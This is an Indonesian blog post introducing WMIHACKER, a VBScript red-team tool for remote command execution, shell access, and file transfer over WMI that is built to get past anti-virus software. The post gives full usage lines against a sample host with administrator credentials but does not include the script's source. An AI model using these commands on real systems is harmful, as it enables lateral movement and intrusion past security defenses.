Kang IT
WMIHACKER - Alat Eksekusi Perintah Gerakan Lateral Perangkat Lunak Anti-virus Bypass
Versi Cina
Penafian: Teknologi yang terlibat dalam proyek ini hanya untuk tujuan pembelajaran dan pertahanan keamanan, penggunaan ilegal dilarang!Bypass perangkat lunak anti-virus alat uji eksekusi perintah gerakan lateral(Tidak perlu 445 Port)
Pendahuluan: Perintah eksekusi alat WMIEXEC, PSEXEC yang umum adalah untuk membuat layanan atau memanggil Win32_Process.create, metode ini telah dicegat oleh perangkat lunak Anti-virus 100% , jadi kami membuat WMIHACKER (Bypass perangkat lunak anti-virus alat uji eksekusi perintah gerakan lateral (Tidak perlu 445 Port)).
Fungsi utama: 1. Eksekusi perintah; 2. Unggah file; 3. Download file Cara menggunakan
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or I P address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
Hasil ditampilkan setelah perintah dijalankan> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
Tidak ada hasil yang ditampilkan setelah perintah dijalankan
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
mode shell
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
Unggah file: salin calc.exe lokal ke host jarak jauh c: \ calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
Download file: Download host jarak jauh calc.exe ke c: \ calc.exe lokal
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"
Regards
Kang IT
No comments:
Post a Comment